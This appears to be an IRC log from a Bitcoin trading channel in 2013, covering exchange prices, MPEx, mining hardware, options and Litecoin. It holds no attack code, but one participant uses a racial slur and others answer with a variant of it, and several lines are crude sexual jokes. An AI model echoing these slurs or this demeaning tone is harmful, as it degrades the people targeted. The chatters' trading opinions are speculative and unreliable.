the role of the "stupid money" at online poker tables - keeping the system adequately "pressurized" for real commerce Apr 04 19:42:11 i doubt this is the case. the uberpressure comes from store of value applications. Apr 04 19:42:37 but incidentally, you probably should package and publish this convo, it's too good to go to ircwaste. Apr 04 19:43:02 and virtually nobody appears to be the least bit interested in my (or anyone else's) ideas for cutting the fiat world out of the loop (I suggested product delivery via dead drops, flying machines, other crackpot nuttery) Apr 04 19:43:17 cause you're even too soon-er than the atm stuff. Apr 04 19:44:17 mircea_popescu: you can repackage and post this if you like, the readers of my little computer architecture blog are probably tired of the BTC ramblings... Apr 04 19:44:36 so start a btc blog, you're clearly more interested in this than that. Apr 04 19:45:18 mircea_popescu: I'm more of an amateur mathematics crackpot than a serious BTC enthusiast. I have ~3 BTC... Apr 04 19:45:21 asciilifeform where do you blog? Apr 04 19:45:32 benkay: http://www.loper-os.org/ Apr 04 19:45:38 you know that's entirely besides the point Apr 04 19:45:56 and when did content creators start caring about readers, what the fuck is this, soviet russia ? Apr 04 19:46:11 is it possible or advisable to run a node on ec2? Apr 04 19:46:19 deadweasel certainly possible. Apr 04 19:46:28 bw isn't huge either. Apr 04 19:46:39 deadweasely: just don't try to mine there Apr 04 19:46:49 no, i won't Apr 04 19:47:04 deadweasely: although if the price does up 100 fold (but the difficulty somehow remains similar to today's) it will be cash-positive. Apr 04 19:47:05 ahahaa wait. how much of that ~3 you made on mpex ? Apr 04 19:47:30 mircea_popescu: you gave me 1.0, which turned into 1.4. As described in my review of the service. Apr 04 19:47:37 this kicks ass. Apr 04 19:47:48 i would like to do something like that and have my node online. that wouldn't even cost much at all right? Apr 04 19:47:56 bitesak nothing huge no. Apr 04 19:48:06 a beer sorta thing Apr 04 19:48:45 bitesak: ec2 has an ebay-like bid system where, if used, your instance only runs when CPU time is available at or below your max bid. Apr 04 19:49:04 and it's lame as hell, don't use it Apr 04 19:49:05 prolly not so grand for nodes tho Apr 04 19:49:07 you'll pay more Apr 04 19:49:16 Mircea_popescu is here? Apr 04 19:49:18 ya ebay system exists to get more bux Apr 04 19:49:20 hi Rick___ Apr 04 19:49:25 Hi Apr 04 19:49:30 need help Apr 04 19:49:32 sure. Apr 04 19:49:34 i started an instance, never even logged in and they stuck me with $15.01 bill this mo. Apr 04 19:49:35 on of my client Apr 04 19:49:40 would it be better/easier to run a node on a Raspberry Pi? Apr 04 19:49:52 bitesak i don't think pi can cope Apr 04 19:49:53 one of my client just send you guys his key Apr 04 19:50:52 bitesak: i'd love to, no time, rather use ec2 free instances. Apr 04 19:50:59 run .71 .81 Apr 04 19:53:09 mircea_popescu: you always seem to cheer me up Apr 04 19:53:17 hallo. Apr 04 19:54:11 asciilifeform, can you post link for the 'review of service'? Apr 04 19:55:36 bitesak: http://www.loper-os.org/?p=1108 ("A Review of MPEx, the Bitcoin Stock Exchange.") Apr 04 19:55:44 new idea: double the price Apr 04 19:56:03 cut the hashrate by %60 because Apr 04 19:59:12 nice Apr 04 19:59:15 mpex review Apr 04 19:59:38 i remember that review Apr 04 19:59:51 anyone here uses a mac to talk to mpex ? Apr 04 20:00:35 mircea_popescu: I did (along with a linux box.) GPG works equally well on any reasonable *nix machine. Apr 04 20:00:48 mircea_popescu did you tell this guy what to write Apr 04 20:00:52 asciilifeform does this gpgtools thing work somehow ? Apr 04 20:00:58 Rick___ has trouble with the syntax or something Apr 04 20:01:06 jcpham i never tell people what to write Apr 04 20:01:24 are you suuuuuure he isn't reading from a script you manipulator, you Apr 04 20:01:31 mircea_popescu: yes, that plus https://github.com/Azelphur/pyMPEx (as linked from your manual, actually) Apr 04 20:01:31 not more than you are. Apr 04 20:01:36 damn Apr 04 20:01:54 it's funny tho, there you go asciilifeform, you're now empuppeted. Apr 04 20:02:18 an entire life dedicated to hanging as a sheep pregnant with twin lambs Apr 04 20:02:20 mircea_popescu: considering what I concluded in that piece, this is hilariously funny Apr 04 20:02:21 and all for naught. Apr 04 20:02:51 [MPEX] [S.MPOE] 14600 @ 0.00071356 = 10.418 BTC [+] Apr 04 20:03:41 oh man these new BFL prices are great Apr 04 20:04:03 with fans or without fans ? Apr 04 20:04:06 "gee, you want 60GH/s, here have 25GH/s instead for more money" Apr 04 20:04:14 avalon did it... Apr 04 20:04:18 southpark did it too. Apr 04 20:04:25 minirigs are out of stock too Apr 04 20:04:29 in case you wanted one Apr 04 20:04:51 pham> are you suuuuuure he isn't reading from a script you manipulator, you Apr 04 20:04:54 <[\\\]> http://www.butterflylabs.com/faq/ Apr 04 20:04:55 wtf Apr 04 20:04:56 far as i'm concerned the laugh of the year is that after demonstrating a box of fans at that convention, bfl "delivered" to their shill "cumstomer" a board which cools passively. Apr 04 20:04:58 <[\\\]> still lists october ship date Apr 04 20:04:59 this is so far out there... Apr 04 20:05:01 did my paste just do Apr 04 20:06:04 I guess they cannot fix the power regulator thing Apr 04 20:06:54 why is nobody talking about how Avalon shipped HardCopy FPGAs instead of real ASICs? Apr 04 20:07:04 ??? Apr 04 20:07:15 is this the clock buffers jet injector ? Apr 04 20:07:23 deadweasely: it explains the power consumption Apr 04 20:07:29 asciilifeform because lazy bums such as yourself haven't taken one apart to prove this. Apr 04 20:07:37 lol ^ Apr 04 20:07:52 nobody dare void their warranty Apr 04 20:07:55 :) Apr 04 20:08:02 except lmao Apr 04 20:08:03 you troll you Apr 04 20:08:09 mircea_popescu: mail me one and I'll happily vivisect it and post the result Apr 04 20:08:30 yes. except i only order shit i pay for after it's delivered. Apr 04 20:08:34 from strippers to bagels. Apr 04 20:08:37 but the watt/hash/hr figure is a smoking gun by itself Apr 04 20:08:44 depends how stupid they are. Apr 04 20:08:53 i can make you an asic that uses up 500W per chip Apr 04 20:09:16 well yes, and I can wire a resistor from my garbage can across the power terminals and use 500W Apr 04 20:09:29 exactly. Apr 04 20:09:48 but the fact is, a real asic has a 7 figure (USD) tooling cost and hardcopy FPGAs have 4 figure tooling cost. Apr 04 20:10:03 you obviously don't own enough bitcoins. Apr 04 20:10:25 your thought process is suspiciously normal. Apr 04 20:10:35 looking to get banned or something ? Apr 04 20:10:52 mircea_popescu: I tend to think in the currency I buy food with. Is this really so odd? Apr 04 20:11:01 I don't think anybody is shocked if Avalon is a HardCopy Apr 04 20:11:07 HardCopy is still an ASIC Apr 04 20:11:09 it's just a shitty ASIC Apr 04 20:11:17 which is why they got to market before BFL did :-P Apr 04 20:11:28 asciilifeform anyway, there was a huge-ish bet on avalon delivering. Apr 04 20:11:39 someone could have bet no, taken one apart, proven it and maybe won ~200 btc Apr 04 20:11:45 nobody did so it doesn't really matter imo. Apr 04 20:12:00 ii wondered that when they offered buybacks... Apr 04 20:12:01 gwillen: it is an ASIC only in the sense that it isn't field-programmable. But most of the actual circuitry is identical to that of an FPGA Apr 04 20:12:10 asciilifeform well... most bitcoiners buy food in stamps. Apr 04 20:12:11 asciilifeform: yes, it's called "structured ASIC" Apr 04 20:12:22 http://en.wikipedia.org/wiki/Structured_ASIC_platform Apr 04 20:12:28 it's higher performance and cheaper than FPGA Apr 04 20:12:38 gwillen: the marketdroids can call a turd a sausage and eat with relish. but we don't have to Apr 04 20:12:40 but lower performance than full ASIC Apr 04 20:13:04 anyway. some chick that's banging jeff bezos must get him to make a proper asic run. Apr 04 20:13:37 send him female gift! Apr 04 20:13:44 amazon comes out with elastic mining instances. Apr 04 20:13:51 from her womb explodes an asic! Apr 04 20:14:03 [HAVELOCK] [SDICE] 2 @ 0.37 = 0.74 BTC [+] Apr 04 20:14:29 i got nobody in washington Apr 04 20:14:33 dang Apr 04 20:14:37 fucking dead end, nothing but geeks, no girls want to be there. Apr 04 20:15:03 [HAVELOCK] [SDICE] 1 @ 0.36 BTC [-] Apr 04 20:15:58 mircea_popescu: washington dc? why? Apr 04 20:16:02 [MPEX] [S.MPOE] 10950 @ 0.00071031 = 7.7779 BTC [-] Apr 04 20:16:04 washington state. Apr 04 20:16:35 o fuck me ? has it occured ? Apr 04 20:16:39 ;;ticker Apr 04 20:16:40 BTCUSD ticker | Best bid: 131.10001, Best ask: 132.99693, Bid-ask spread: 1.89692, Last trade: 131.10001, 24 hour volume: 125348.75480664, 24 hour low: 110.00000, 24 hour high: 142.12000, 24 hour vwap: 127.72686 Apr 04 20:16:52 [BTCTC] [ASICMINER-PT] 1 @ 0.7699 BTC [+] Apr 04 20:16:56 ;;calc 710310 * 131.10001 Apr 04 20:16:56 93121648.1031 Apr 04 20:16:58 gah Apr 04 20:17:05 !ticker h havelock Apr 04 20:17:08 You had the last Philistine. This one's mine. Apr 04 20:17:28 !ticker h him Apr 04 20:17:29 [HAVELOCK:HIM] 1D: / 0 / (0 shares, 0 BTC), 7D: 1.80000000 / 1.96201695 / 2.08000000 (118 shares, 231.51799996 BTC), 30D: 1.41000000 / 1.81224245 / 2.08000000 (716 shares, 1297.56559240 BTC) Apr 04 20:17:46 [MPEX] [S.DICE] 1000 @ 0.00333 = 3.33 BTC [+] Apr 04 20:22:25 [MPEX] [S.MPOE] 25522 @ 0.00071031 = 18.1285 BTC [-] Apr 04 20:22:56 mircea_popescu: total armchair criticism here.... does bitbet have too many bets and not enough advertising (not paid necessarily, but maybe new bets are posted in bitcointalk bitbet thread? just talking out my ass here. i like bitbet, big potential there. Apr 04 20:23:12 well i dunno. Apr 04 20:23:21 the good thing is that people can advertise it to their benefit Apr 04 20:23:31 feb saw like 3 bux worth of ref fees paid Apr 04 20:23:33 you know i do. Apr 04 20:23:34 march was 100 Apr 04 20:23:48 i imagine it will explode once more people figure it out Apr 04 20:24:07 i know you do what ? Apr 04 20:24:16 should you have bitbet thread posting the new bets so people see them on recent posts on the forum? Apr 04 20:24:27 i use the ref link in my sig.... Apr 04 20:24:41 a ok. Apr 04 20:24:45 you paid me $30 in refs already this mo. Apr 04 20:24:48 :) Apr 04 20:24:48 i don't read the forum. Apr 04 20:24:48 thx Apr 04 20:24:53 yw but i had no ideal ol Apr 04 20:25:11 i try not to, but i want to spam my ref links now, so i reply to newbs and help them out. Apr 04 20:25:17 prolly will end up having to hiore some ex pron aff manager Apr 04 20:25:23 and they see my sig Apr 04 20:26:02 pretty cool. Apr 04 20:27:09 well, i'm down to whoring for btc since i can't actually buy in anymore on the borked exchanges Apr 04 20:27:17 heh. Apr 04 20:28:50 http://www.youtube.com/watch?v=5bQh-erEeI0 Apr 04 20:28:52 pretty funny Apr 04 20:29:52 mmircea-popescu - you waiting for it to go over $100 million? Apr 04 20:29:59 micrea-popescu Apr 04 20:30:00 [BTCTC] [BTC-TRADING-PT] 2 @ 0.1722 = 0.3444 BTC [-] Apr 04 20:30:11 jborkl i already claimed 1st to 50mn, angling for 100 now Apr 04 20:30:15 next stop, half bn Apr 04 20:30:56 yeah, it did not take long for it to go up 50 million Apr 04 20:31:11 good deal, congrats Apr 04 20:34:28 it's like pushing nipples down. Apr 04 20:34:34 impossible but lots of fun Apr 04 20:35:36 :] Apr 04 20:46:27 ;;ticker Apr 04 20:46:28 BTCUSD ticker | Best bid: 129.00999, Best ask: 129.25000, Bid-ask spread: 0.24001, Last trade: 129.00100, 24 hour volume: 126044.17368292, 24 hour low: 110.00000, 24 hour high: 142.12000, 24 hour vwap: 127.57859 Apr 04 20:47:12 http://www.zerohedge.com/news/2013-04-04/visualizing-bitcoin-encryption-standard Apr 04 20:49:40 [MPEX] [S.MPOE] 2553 @ 0.00071356 = 1.8217 BTC [+] Apr 04 20:49:42 [MPEX] [S.MPOE] 497 @ 0.00071367 = 0.3547 BTC [+] Apr 04 20:49:49 ;;seen mircea_popescu Apr 04 20:49:49 mircea_popescu was last seen in #bitcoin-assets 15 minutes and 14 seconds ago: impossible but lots of fun Apr 04 20:50:05 did he go to sleep? Apr 04 20:52:11 according to his webcam i hacked, he's fapping. ;D Apr 04 20:56:16 mpoe bounced back Apr 04 20:56:20 !ticker h him Apr 04 20:56:22 [HAVELOCK:HIM] 1D: / 0 / (0 shares, 0 BTC), 7D: 1.80000000 / 1.96201695 / 2.08000000 (118 shares, 231.51799996 BTC), 30D: 1.41000000 / 1.81224245 / 2.08000000 (716 shares, 1297.56559240 BTC) Apr 04 21:02:55 deadweasely yea, on yourmom. Apr 04 21:03:03 sup kakobrekla Apr 04 21:04:05 [MPEX] [S.MPOE] 803 @ 0.00071367 = 0.5731 BTC [+] Apr 04 21:04:12 [MPEX] [S.MPOE] 7510 @ 0.00071368 = 5.3597 BTC [+] Apr 04 21:04:14 [MPEX] [S.MPOE] 13824 @ 0.00071453 = 9.8777 BTC [+] Apr 04 21:05:57 getting closer Apr 04 21:06:15 ok, this guy might have just won the troll competition. Apr 04 21:06:28 so his new gf is a ballerina. she also happens to be polish. Apr 04 21:06:36 he takes her to meet his family (mom, dad, sisters, grama) Apr 04 21:06:42 and he tells them that the girl is Apr 04 21:06:43 a Apr 04 21:06:43 pole Apr 04 21:06:44 dancer Apr 04 21:06:59 HA Apr 04 21:07:04 LOL Apr 04 21:07:19 how many pole dancers does it take to...i give up Apr 04 21:07:25 lol Apr 04 21:07:32 i thought i had something for this Apr 04 21:07:34 to screw in a light bulb ? Apr 04 21:07:40 there we go! Apr 04 21:07:55 none, pole dancers screw in a puddle of beer? Apr 04 21:08:01 hahaha Apr 04 21:08:13 in the coatcheck room Apr 04 21:08:21 haha, yes, that's more classy Apr 04 21:08:31 i do drink with my pinky out Apr 04 21:08:38 there's a reason wardrobe has a little bar Apr 04 21:08:57 how are the bars in timisoara (sorry if misspelled) Apr 04 21:09:03 mostly square Apr 04 21:09:16 strip clubs? Apr 04 21:09:23 just like strip clubs Apr 04 21:09:55 little desperation mixed with single mothers? Apr 04 21:10:02 not rly. mostly college students. Apr 04 21:10:07 oh, NICE Apr 04 21:10:18 this is yurp remember ? Apr 04 21:10:22 we're not nutty about fucking here. Apr 04 21:10:26 ah yes, not quite as puritanical Apr 04 21:10:32 cheap perfume? Apr 04 21:10:38 that's universal. Apr 04 21:10:45 and glitter that can't be gotten rid of? lol Apr 04 21:10:46 you get cheap perfume in vegas. Apr 04 21:10:56 or nyc Apr 04 21:11:10 well nyc. i meant places where people have money. Apr 04 21:11:19 http://www.icij.org/offshore Apr 04 21:11:26 hahaha, what do they smell like in other places? Apr 04 21:12:03 [HAVELOCK] [VTX] 2 @ 0.4492 = 0.8984 BTC [+] Apr 04 21:12:10 there have been leaks on the offshore world with millions of records, pics and more Apr 04 21:12:17 i'm just not a huge fan of strip clubs... Apr 04 21:12:57 "A cache of 2.5 million files has cracked open the secrets of more than 120,000 offshore companies and trusts" Apr 04 21:13:00 bitesak: very interesting Apr 04 21:13:21 do you think they will eventually try and tie wealthy people to bitcoin addresses? Apr 04 21:14:06 just saw it on the swiss news tonight, french treasurer of current president exposed as having 2 cayman islands outfits.. Apr 04 21:15:49 by the way...i really liked that "ussa" Apr 04 21:16:06 ok so i've got news from erik, Apr 04 21:16:21 he's moved to an undisclosed offshore location, getting reorganised, Apr 04 21:16:28 s.dice report and divs asap. Apr 04 21:17:11 <[\\\]> anyone use vircurex? Apr 04 21:17:18 <[\\\]> am I risking my life using it? Apr 04 21:17:42 i never used it. is this kumala's thing ? Apr 04 21:17:52 <[\\\]> dunno who actually runs it Apr 04 21:17:58 <[\\\]> but its been around for a while Apr 04 21:18:00 what are you, an idiot ? Apr 04 21:18:04 don't use services you don't know the owner of. Apr 04 21:18:08 <[\\\]> I'm talking to you Apr 04 21:18:13 <[\\\]> so clearly I must be Apr 04 21:18:15 <[\\\]> :-) Apr 04 21:18:34 no but seriously. Apr 04 21:19:05 [HAVELOCK] [SDICE] 1 @ 0.38199999 BTC [+] Apr 04 21:20:14 <[\\\]> no but seriously Apr 04 21:20:20 <[\\\]> so even if I knew some guys screen name Apr 04 21:20:23 <[\\\]> that doesn't do anything for me Apr 04 21:20:33 <[\\\]> I know mtux runs gox, that doesn't mean anything Apr 04 21:20:42 but you kinda know who he is neh ? Apr 04 21:21:31 did erik say dividends? Apr 04 21:21:43 didn't think there would be any this month Apr 04 21:22:06 well, in the sense of saying what they are. 0 is still a number. Apr 04 21:23:46 <[\\\]> whats going on iwth erik? Apr 04 21:23:47 Anyone here? Apr 04 21:23:58 [BTCTC] [ASICMINER-PT] 1 @ 0.7699 BTC [+] Apr 04 21:24:07 lol Apr 04 21:24:09 yes lol, someone's here. Apr 04 21:24:15 [\\\] he finally did the smart thing and quit the us. Apr 04 21:24:24 Where's a good place to discuss ltc/nmc/ppc etc? Apr 04 21:24:32 probably not here. Apr 04 21:24:58 this is mostly porn and weird artsy shit. Apr 04 21:25:15 <[\\\]> mircea_popescu, so he got out of the us? was he being harassed? Apr 04 21:25:15 Any better general crypto currency chat rooms? Apr 04 21:25:26 I'm tired of the spam on btc-e Apr 04 21:25:28 pgp pib1943 pigeons pizzaman1337 Populus PsychoticBoy Pucilowski Apr 04 21:25:30 [\\\] nah Apr 04 21:25:52 cryptrader tell you honeslty i don't know. i've never been into the alt chains. Apr 04 21:26:05 i thought that spam was what they traded on btc-e Apr 04 21:26:10 and trolling Apr 04 21:26:42 whats ltc at? Apr 04 21:27:14 Floating above $4usd Apr 04 21:27:19 insanity. Apr 04 21:27:27 yeah Apr 04 21:27:31 It was at 6 yesterday Apr 04 21:27:36 really? Apr 04 21:27:56 Yep made some $ off that Apr 04 21:28:11 Just trading with 2btc tho lol Apr 04 21:28:57 Now ppc is doubling Apr 04 21:29:33 i guess noobs are figuring out all it takes is poeople for an alt-coin to become profitable Apr 04 21:29:45 mircea_popescu: serious about Erik? Apr 04 21:29:56 that he finally packed up and moved ? yes. Apr 04 21:30:04 Where was he from before US? Apr 04 21:30:13 what do you mean before ys Apr 04 21:30:39 Yeah I'm just realizing it myself btc isn't the only and diversifying only makes sense Apr 04 21:31:04 But with most of them all you can do is buy/sell btc but it sure is fun Apr 04 21:31:40 Erik is satoshidice owner right? Apr 04 21:32:01 yes Apr 04 21:32:17 cryptrader sounds like ponzifun to me, but anyway. Apr 04 21:32:18 information costs money Apr 04 21:32:32 Wonder how rich he is... Apr 04 21:32:35 mircea_popescu gives it out for free Apr 04 21:32:36 I thought from his last name he was Dutch or something. Apr 04 21:32:45 (at first) Apr 04 21:32:46 unbalanced ya cause that works in the us. Apr 04 21:32:56 all the cohen people are from like lebanon. Apr 04 21:33:17 I know, I walked into that one. Apr 04 21:33:21 :D Apr 04 21:33:46 I blame Austin Powers... can't trust the Dutch. Apr 04 21:35:12 (I could also claim points for not assuming everyone was American) Apr 04 21:35:23 [\\\] im using vircurex, didn't eat me so far Apr 04 21:35:45 nor did it eat some ltcs i bought year ago Apr 04 21:36:02 hey jurov, while I'm on a roll with my ignorance, what does the "br" in coinbr mean or stand for? Apr 04 21:36:02 deadweasely whore, you around? Apr 04 21:36:22 was meant to stand for broker Apr 04 21:36:28 ah thx Apr 04 21:36:31 but feel free to invent sth Apr 04 21:37:07 all btc services have sexually colored malapropism Apr 04 21:37:18 thus i feel excluded with coinbr Apr 04 21:37:42 so...pay rent in bitcoin directly to property management company... Apr 04 21:37:58 <[\\\]> thanks jurov Apr 04 21:38:10 <[\\\]> MJR_: another bitpay vendor.. big deal. Apr 04 21:38:15 https://www.aepropertymanage.com/index.html#news Apr 04 21:38:15 nope Apr 04 21:38:25 the owner of the company invested in bitcoins Apr 04 21:38:28 <[\\\]> Let's see someone accept actual coins and use them to pay for their employes Apr 04 21:38:31 <[\\\]> those palces are special Apr 04 21:38:43 when asked about volatility he said "bitcoin is more valuable than dollars, i don't care about volatility" Apr 04 21:39:37 https://www.aepropertymanage.com/rental-properties-rental-homes-memphis-tn.php Apr 04 21:39:40 not bitpay Apr 04 21:39:45 i hope they don't get hacked... Apr 04 21:40:36 that is a positive sign, that he is willing to provide rent in bitcoin...the next step is a large employer to offer to pay in bitcoin Apr 04 21:40:42 <[\\\]> they're using coinbase Apr 04 21:40:46 <[\\\]> you realise thats just like bitpay? Apr 04 21:40:49 are you sure? Apr 04 21:40:54 <[\\\]> yes Apr 04 21:40:59 <[\\\]> when you check out, it pops up Apr 04 21:41:19 <[\\\]> fill in a fake amount and address, then click bitcoin Apr 04 21:41:26 [BTCTC] [BASIC-MINING] 3 @ 0.39 = 1.17 BTC [+] Apr 04 21:41:28 [MPEX] [S.DICE] 2253 @ 0.00333 = 7.5025 BTC [+] Apr 04 21:42:26 wrong Apr 04 21:42:39 can't you pay with a regular bitcoin addresss Apr 04 21:42:43 or a coinbase account Apr 04 21:42:58 even if they manage the web interface the owner said he owns and wants bitcoins Apr 04 21:43:24 so it is not simply a cash to btc translator but rather a merchant looking to actively acquire bitcoin in exchange for services Apr 04 21:46:24 ;;ticker Apr 04 21:46:25 BTCUSD ticker | Best bid: 132.00000, Best ask: 132.67999, Bid-ask spread: 0.67999, Last trade: 132.00000, 24 hour volume: 124042.97259498, 24 hour low: 110.00000, 24 hour high: 142.12000, 24 hour vwap: 127.34869 Apr 04 21:48:18 [BTCTC] [BASIC-MINING] 2 @ 0.39 = 0.78 BTC [+] Apr 04 21:48:42 aha...i just found the best article talking about why bitcoin will not be negatively affected by deflation Apr 04 21:49:47 http://www.nasdaq.com/article/the-lines-in-the-bitcoin-bubble-battle-are-drawn-what-side-are-you-on-cm233350 Apr 04 21:49:51 [\\\], ive used vircurex for about a month or so Apr 04 21:50:04 everythings been smooth as warm butter Apr 04 21:50:14 <[\\\]> they're struggling today Apr 04 21:50:17 its finally getting some traction among big bwanas now thats above 100 Apr 04 21:50:18 <[\\\]> bad gateway messages Apr 04 21:50:27 hm Apr 04 21:50:28 not for me Apr 04 21:50:48 <[\\\]> you know that thing we talked about yesterday? Apr 04 21:50:50 <[\\\]> 4x Apr 04 21:50:55 <[\\\]> made my day Apr 04 21:50:55 since bitcoin is rarely used as a unit of account, people don't pay rent denominated in bitcoin, or have salaries denominated in bitcoin Apr 04 21:51:17 it can float against the dollar but will probably be able to buy more in dollars in the future Apr 04 21:51:17 [\\\], what thing? Apr 04 21:51:40 oh yeah yeah Apr 04 21:51:42 :) Apr 04 21:52:45 ;;ticker Apr 04 21:52:46 BTCUSD ticker | Best bid: 132.39801, Best ask: 132.48016, Bid-ask spread: 0.08215, Last trade: 132.39800, 24 hour volume: 122979.85614229, 24 hour low: 110.00000, 24 hour high: 142.12000, 24 hour vwap: 127.31262 Apr 04 22:00:33 [MPEX] [S.MPOE] 4976 @ 0.00071453 = 3.5555 BTC [+] Apr 04 22:00:33 [MPEX] [S.MPOE] 12700 @ 0.0007146 = 9.0754 BTC [+] Apr 04 22:00:35 there's a bitcoin bubble battle ? Apr 04 22:00:40 [MPEX] [S.MPOE] 2405 @ 0.00071514 = 1.7199 BTC [+] Apr 04 22:03:04 [HAVELOCK] [VTX] 1 @ 0.435 BTC [-] Apr 04 22:05:03 [HAVELOCK] [VTX] 1 @ 0.435 BTC [-] Apr 04 22:08:37 http://bitbet.us/bet/330/mtgox-bitcoin-u/ Apr 04 22:08:39 look at that thing Apr 04 22:10:23 ridiculous. Apr 04 22:11:45 for srs. Apr 04 22:15:15 y'all on yes or no? Apr 04 22:18:08 [MPEX] [S.DICE] 98 @ 0.00333333 = 0.3267 BTC [+] Apr 04 22:18:40 [BTCTC] [ASICMINER-PT] 1 @ 0.7699 BTC [+] Apr 04 22:20:40 nope Apr 04 22:20:41 gox is starting to lag again Apr 04 22:32:22 mircea_popescu: nope on the $200 april bbet? Apr 04 22:34:32 deadweasel yea Apr 04 22:38:01 i guess i can hedge my calls with a no bet Apr 04 22:38:26 that;'s an idea Apr 04 22:39:26 cash those calls Apr 04 22:39:43 sell to bot? Apr 04 22:41:27 you could also put them on the market, undercut bot Apr 04 22:41:42 buy low sell high Apr 04 22:43:06 well, i bought c188Ts at .087.... so 205 to break even. Apr 04 22:44:18 my first options! aren't you all proud?! Apr 04 22:44:28 probably not. Apr 04 22:44:52 188 is too high Apr 04 22:45:43 iam proud! Apr 04 22:46:44 i realize now... learning requires mistakes. so by the end of all this i'll be broke but rich in wisdom. it's a fair trade. Apr 04 22:48:37 looks like i was about $100 of the strike i should have bought, but the others were so expensive already on coinbr... Apr 04 22:48:42 of / off Apr 04 22:48:56 who's to say that every stoner wont pile in on 4/20 and send the price over 205 though? Apr 04 22:49:01 so who knows Apr 04 22:49:04 back when btc was 5ish it was hella cheap way to learn finance Apr 04 22:49:08 but even now is better than alternative Apr 04 22:49:22 mod6, that's a great point, college stoners buying btc. Apr 04 22:49:25 :) Apr 04 22:49:28 mod6 205 really wouldn't be all that good for anyone. Apr 04 22:49:34 i hear ya Apr 04 22:49:43 https://bitcointalk.org/index.php?topic=87358.msg1738363#msg1738363 <<< last glbse remnants salvaged? Apr 04 22:49:46 deadweasely: sell back the calls and sell otm puts Apr 04 22:49:46 im just sayin... its a speculative bet... Apr 04 22:50:12 what do you say about litecoin, friends? Apr 04 22:50:12 (12:49) < mircea_popescu> back when btc was 5ish it was hella cheap way to learn finance << i certainly learned A LOT Apr 04 22:50:22 http://pastebin.com/PthgrzDS here's a buncha dorks from a year ago. Apr 04 22:50:32 Lyspooner you missed that bubble :D Apr 04 22:50:39 i thought bitvps was a scam? Apr 04 22:51:13 deadweasely, ask namworld about it Apr 04 22:51:22 and see PM Apr 04 22:52:29 mircea_popescu: i own zero LTC, but what is different about me saying "the people who say BTC is stupid are stupid" and someone calling me stupid for saying LTC is stupid Apr 04 22:52:39 "I bet. I won but have undone me obviously missed. They were fools and ridiculous to me have closed. Fuck them and their site of betting." Apr 04 22:52:46 this is pretty good. Apr 04 22:53:05 Lyspooner bear with me i'm tired and that was too complex Apr 04 22:53:37 ;;ticker Apr 04 22:53:38 BTCUSD ticker | Best bid: 132.00000, Best ask: 132.20000, Bid-ask spread: 0.20000, Last trade: 132.20000, 24 hour volume: 117001.33142800, 24 hour low: 110.00000, 24 hour high: 142.12000, 24 hour vwap: 127.72542 Apr 04 22:53:44 ;;calc 0.00757575*127.72542 Apr 04 22:53:44 0.967615850565 Apr 04 22:53:44 deadweasely: i guess too though, you have to figure in theta decay Apr 04 22:53:52 since 4/20 is some days off yet Apr 04 22:54:21 if LTC pulls itself up by its bootstraps as BTC did, why dismiss it? Apr 04 22:56:01 mod6 you lost me on theta decay, i'm looking it up now. ok, time premium stuff. Apr 04 22:56:16 Lyspooner there's no prize for being 2nd. Apr 04 22:56:46 you don;'t know who the second guy to discover newton's law is. Apr 04 22:56:47 what if there was Apr 04 22:56:51 yeah, you get time decay on options up until opex Apr 04 22:57:26 all the tards who want to play bitcoin gem / bitcoin gold bar / ultimate satoshi / etc will have to go somewhere. Apr 04 22:57:53 since btc isn't working all that well for them. Apr 04 22:58:17 http://www.capturingtheta.com/ my reading material tonight Apr 04 22:58:25 the price of a bitcoin should equal the price of a litecoin when normalized for the size of the total money supply to exist Apr 04 22:58:25 mod6 is this good source? Apr 04 22:59:01 with maybe some premium assigned to the security of the hashing algorithms Apr 04 22:59:09 absolutely not at all. Apr 04 22:59:20 well looks like they have something there... i acutally just read up on "the greeks" (options greeks) at like wikipedia (lol) Apr 04 22:59:23 this is like saying that the per capita income of your random nigger should equal the per capita income of your random jew. Apr 04 22:59:26 not in this world. Apr 04 22:59:30 and I did watch a bunch of the video's on options trading at CBOE.com Apr 04 22:59:45 (go figure, use wall-street to learn how to trade mpex.) Apr 04 22:59:47 that's like your third metaphor that i don't find sufficient Apr 04 23:00:00 2nd class citizens man, there's no curing that. Apr 04 23:00:19 what, is ltc going to do a million coin march on the internet ? Apr 04 23:00:37 http://www.cboe.com/tradtool/webcast.aspx << bunch of educational vids on options here Apr 04 23:00:58 arguments against litecoin now remind me of arguments against bitcoin three years ago.... no one should use it because no one will use it Apr 04 23:01:14 you're misrepresenting the argument. Apr 04 23:01:26 cunnyshack opens. one girl in it. Apr 04 23:01:26 mircea_popescu: you should use nigga instead of nigger, more proper Apr 04 23:01:28 thx mod6 Apr 04 23:01:35 old wives argument : nobody goes to the cunnyshack. Apr 04 23:01:39 propa Apr 04 23:01:39 men do go fuck her silly. Apr 04 23:01:46 deadweasely: np Apr 04 23:01:47 2nd girl joins cunnyshack. Apr 04 23:02:01 well... fuck. this was my worst metaphor to date. Apr 04 23:02:38 anyway. ltc only exists to ponzi atm. Apr 04 23:02:52 poor people like it because it feels closer to what they want in an asset. Apr 04 23:03:19 mircea_popescu: why do btc businesses fail so easily? Apr 04 23:03:31 cause they're run by geeks. Apr 04 23:03:46 just like restaurants run by cooks or sitcoms run by actors fail. Apr 04 23:03:59 "ltc is a ponzi scheme" Apr 04 23:04:05 where have i heard that before Apr 04 23:04:06 deadweasely: here's one last link for ya http://en.wikipedia.org/wiki/Greeks_(finance) Apr 04 23:04:28 well like 90% of new businesses that have nothing to do with btc fail.. Just because it's btc related shouldn't make that change. Apr 04 23:04:31 BTC money supply is actually BTC + LTC money supply Apr 04 23:04:36 Lyspooner no argument there, but you're framing the issue. Apr 04 23:04:39 mircea_popescu: but what busineses are succeeding? even bitinstant and blockchain.info are failures based on most standards Apr 04 23:04:52 thestringpuller how is blockchain.info a failure ? Apr 04 23:05:04 how is it a business? Apr 04 23:05:04 [HAVELOCK] [SDICE] 1 @ 0.32000001 BTC [-] Apr 04 23:05:06 it's serving its userbase remarkably well i thought Apr 04 23:05:27 TomServo diff argument Apr 04 23:05:28 i'll say Apr 04 23:05:59 okay, just Bitinstant then Apr 04 23:06:03 they were hacked Apr 04 23:06:08 haha Apr 04 23:06:10 mtgox is a failure Apr 04 23:06:16 etc. etc. Apr 04 23:06:23 who is actually succeeding? Apr 04 23:06:35 mybitcoin succeeded Apr 04 23:07:32 thestringpuller bitcoin-central. Apr 04 23:08:52 mircea_popescu has spoken!!! move btc to bitcoin-central Apr 04 23:09:04 [HAVELOCK] [SDICE] 29 @ 0.32000001 = 9.28 BTC [-] Apr 04 23:09:10 thestringpuller: how do you consider gox a failure? Apr 04 23:09:34 made like a 